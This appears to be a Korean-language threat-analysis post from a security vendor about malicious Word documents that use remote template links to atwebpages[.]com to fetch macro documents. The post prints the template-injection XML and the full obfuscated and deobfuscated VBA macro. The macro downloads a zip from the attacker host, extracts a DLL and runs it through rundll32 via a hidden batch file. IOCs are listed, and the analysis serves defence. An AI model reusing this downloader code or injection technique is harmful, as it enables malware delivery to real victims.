유사한 도메인 형태의 External 링크를 사용하는 악성 워드 문서

최근 공격 정황들이 확인되고 있는 악성 워드(WORD)문서들은 대부분 매크로 형태이나 이번에 ASEC분석팀은 이 매크로 악성 워드를 실행시키기 위한 상위 공격 과정에서 C2가 살아있는 External 링크 워드를 이용한 케이스를 확인하였다. 이 방식은 과거 게시글에서도 설명한 바있으며 주로 대북관련 본문 내용의 악성 워드에서 사용했었다.

이전 케이스와 같이 동일한 과정을 통해 동작하는 해당 악성 워드의 실행 흐름은 아래와 같다.

  • 실행흐름 : 악성 XML(External 링크 연결)이 포함된 워드 실행 후 추가 악성 파일 다운로드 시도 → 악성 매크로가 포함된 워드 다운로드 → 매크로를 통해 추가 악성 PE 백도어 다운로드

특히 이번에 External 링크 연결에 사용된 주소는 북한 공격 그룹에서 자주 사용하였던 특정 도메인 호스팅 atwebpages[.]com을 이용한 주소였다. 해당 도메인 사용 케이스 중 “kr[숫자].atwebpages[.]com“와 같은 형식의 도메인이 사용되었던 이력은 다음과 같다.

hxxp://kr4952.atwebpages[.]com/view.php?id=1 해당 주소를 사용한 악성 문서 파일명

[대외비]검토자료.docx
인도네시아 현지 법인 관련.docx
hxxp://kr7593.atwebpages[.]com/view.php?id=1 해당 주소를 사용한 악성 문서 파일명

[대외비]검토자료.docx
hxxp://kr2959.atwebpages[.]com/view.php?id=1 해당 주소를 사용한 악성 문서 파일명

마케팅.docx
수정사항.docx
[표1] – “kr[숫자].atwebpages[.]com” 형식을 이용한 악성 워드 파일명

이번에 확인된 케이스는 아래와 같은 XML형태이며 “hxxp://kr9235.atwebpages[.]com/view.php?id=1“에 접속 시도하여 추가 매크로 악성 워드를 다운로드한다.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
Target="http://kr9235.atwebpages.com/view.php?id=1" TargetMode="External"/></Relationships>

다운로드 된 워드의 매크로는 아래와 같이 난독화 되어 있으며 추가 파일을 다운로드 시도한다.

Sub Macro1(df)
    On Error Resume Next
    rp = df & "\cv" & CQka & "wiq" & MnkuM & ".zi" & MnkuM & "p"
    ui = "htt" & CQka & "p:/" & MnkuM & "/kr" & MnkuM & "923" & CQka & "5.a" & MnkuM & "twe" & CQka & "bpa" & CQka & "ges" & CQka & ".co" & CQka & "m/v" & CQka & "iew" & CQka & ".ph" & MnkuM & "p?id" & CQka & "=2"
    DownloadFile ui, rp
    UnZipFile df, rp, "wie" & CQka & "b.d" & CQka & "at"
    Set fso = CreateObject("Scr" & CQka & "ipt" & CQka & "ing" & MnkuM & ".Fi" & CQka & "leS" & CQka & "yst" & MnkuM & "emO" & MnkuM & "bje" & CQka & "ct")
    fso.DeleteFile rp
    btTxt = "run" & CQka & "dll" & MnkuM & "32." & MnkuM & "exe" & CQka & " """ & df & "\wi" & MnkuM & "eb." & MnkuM & "dat" & MnkuM & """ " & CQka & "Run" & vbNewLine & "del" & MnkuM & " /f" & CQka & " /q" & MnkuM & " %0"
    WriteTextFile df & "\nw" & CQka & "ib." & MnkuM & "bat", btTxt, "asc" & MnkuM & "ii"
    
    Set wmObjStart = GetObject("win" & MnkuM & "mgm" & CQka & "ts:" & CQka & "win" & CQka & "32_" & CQka & "Pro" & CQka & "ces" & CQka & "sSt" & MnkuM & "art" & MnkuM & "up")
    Set objConfig = wmObjStart.SpawnInstance_
    objConfig.ShowWindow = 0
    
    
    Set wmObj = GetObject("win" & CQka & "mgm" & CQka & "ts:" & CQka & "win" & CQka & "32_" & MnkuM & "pro" & CQka & "ces" & MnkuM & "s")
    res = wmObj.Create(df & "\nw" & CQka & "ib." & MnkuM & "bat", Null, objConfig, pid)
End Sub
Sub AutoOpen()
    On Error Resume Next
    Application.ActiveWindow.View.Type = wdPrintView
    Set wnd = ActiveDocument
    wnd.Unprotect "6tf" & CQka & "c&Y" & CQka & "GV"
    ViewPage ("xxx")
    wnd.Save
    Set ob_tmp = Application.Templates
    Dim tmp As Template
    For Each tmp In ob_tmp
    If tmp.Type = 0 Then
        Macro1 (tmp.Path)
        Exit For
    End If
    Next
End Sub

이때 확인되는 매크로 코드에서 특정 비밀번호로 보호기능 해제 후 문서 내용 활성화를 시도하는 것으로 보아 위 XML을 포함한 문서에 특정 본문 내용이 있을 것으로 추정된다.

Sub Macro1(df)
    On Error Resume Next
    rp = df & "\cvwiq.zip"
    ui = "http://kr9235.atwebpages.com/view.php?q=2"
    DownloadFile ui, rp
    UnZipFile df, rp, "wieb.dat"
    Set fso = CreateObject("Scripting.FileSystemObject")
    fso.DeleteFile rp
    btTxt = "rundll32.exe """ & df & "\wieb.dat"" Run" & vbNewLine & "del /f /q %0"
    WriteTextFile df & "\nwib.bat", btTxt, "ascii"
    
    Set wmObjStart = GetObject("winmgmts:win32_ProcessStartup")
    Set objConfig = wmObjStart.SpawnInstance_
    objConfig.ShowWindow = 0

난독화를 해제한 코드는 위와 같으며 코드에서 확인되듯 아래와 같은 순서로 동작하며, 최종 다운로드 된 PE는 백도어 기능을 수행한다.

  • 매크로 실행 순서 : 본 문서의 보호기능 해제 → 삽입된 그림파일 제거 → 숨겨진 텍스트 활성화 → “hxxp://kr9235.atwebpages[.]com/view.php?q=2“에서 추가 압축 파일 cvwiq.zip을 다운로드 후 압축해제 → wieb.dat로 압축 해제된 악성 DLL을 rundll32.exe을 통해 실행

위 [표1]에 언급한 “[대외비]검토자료.docx” 중 확보된 문서 케이스 경우에도 External 링크 연결 이후 다운로드 된 매크로 확보는 못하였지만 위 매크로 류와 유사한 워드를 다운로드 받아 동작할 것으로 보인다. 그 이유는 해당 파일 역시 문서에 보호기능이 설정되어 있으며 특정 그림과 숨겨진 텍스트가 존재하기 때문이다. 다만 해당 파일은 아래와 같이 SimSun이라는 중국어 폰트를 사용하고 잇어 분석시 Office 환경 또한 중국어가 실행 될 수 있도록 설정하였다.

  • 예상 실행흐름 : 악성 XML(External 링크 연결)이 포함된 워드 실행 후 추가 악성 파일 다운로드 시도 → 악성 매크로가 포함된 워드 다운로드 → 해당 매크로로부터 상위 파일의 보호기능 해제 후 본문 내용 활성화 매크로를 통해 추가 악성 PE 백도어 다운로드
<w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:cs="SimSun"/>

[그림1] – [대외비]검토자료.docx 실행 화면

위에 설명한 대로 해당 파일은 보호기능이 설정되어 있고 [그림1]과 같은 그림이 본문내용에 포함되어 있다. ASEC분석팀에서는 그동안 분석을 통해 확보한 비밀번호를 통해 수동으로 해당 문서의 보호기능을 해제하고 그림 내용을 제거 및 보호된 텍스트 활성화를 시도하였다. 하지만 아쉽게도 해당 문서는 테스트 형태인 것처럼 중국어 환경임에도 본문 내용이 정상적으로 활성화 되지는 않았다.

하지만 기존과 동일한 공격 흐름을 사용한 악성 파일들이 제작 중일 것이라는 정황들이 확보되었기에 자사에서는 지속적으로 해당 류들에 대한 악성 워드 문서들을 모니터링 할 것이다.

사용자는 출처가 불분명한 문서 열람을 지양하고, V3를 최신 버전으로 업데이트하여 악성코드의 감염을 사전에 차단할 수 있도록 해야 한다.

[파일진단]
Downloader/XML.External
Downloader/DOC.Akdoor

[IOC]
6757787a71561abdf0327e665eb17e8d
4a5661ef2612c914a2ad5c1b6cf98ba1
hxxp://kr4952.atwebpages[.]com/view.php?id=1
hxxp://kr7593.atwebpages[.]com/view.php?id=1
hxxp://kr2959.atwebpages[.]com/view.php?id=1
hxxp://kr9235.atwebpages[.]com/view.php?id=1
hxxp://kr9235.atwebpages[.]com/view.php?q=2

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.


0 0 votes
별점 주기
guest
0 댓글
Inline Feedbacks
View all comments